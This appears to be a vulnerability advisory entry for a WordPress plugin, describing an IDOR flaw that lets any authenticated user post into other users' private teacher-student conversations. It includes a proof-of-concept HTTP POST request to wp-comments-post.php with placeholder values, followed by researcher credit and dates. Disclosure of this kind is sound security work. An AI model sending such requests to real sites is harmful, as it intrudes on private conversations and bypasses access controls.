The plugin does not ensure that the sender of a private message is either the teacher or the original sender, allowing any authenticated user to send messages to arbitrary private conversation via a IDOR attack. Note: Attackers are not able to see responses/messages between the teacher and student
POST /wp-comments-post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 96 Connection: close Cookie: [any authenticated user] Upgrade-Insecure-Requests: 1 comment=<Any+comment>&submit=Post+Comment&comment_post_ID=111&comment_parent=0
Veshraj Ghimire
Veshraj Ghimire
Yes
2022-08-04 (about 10 months ago)
2022-08-04 (about 10 months ago)
2023-04-12 (about 1 months ago)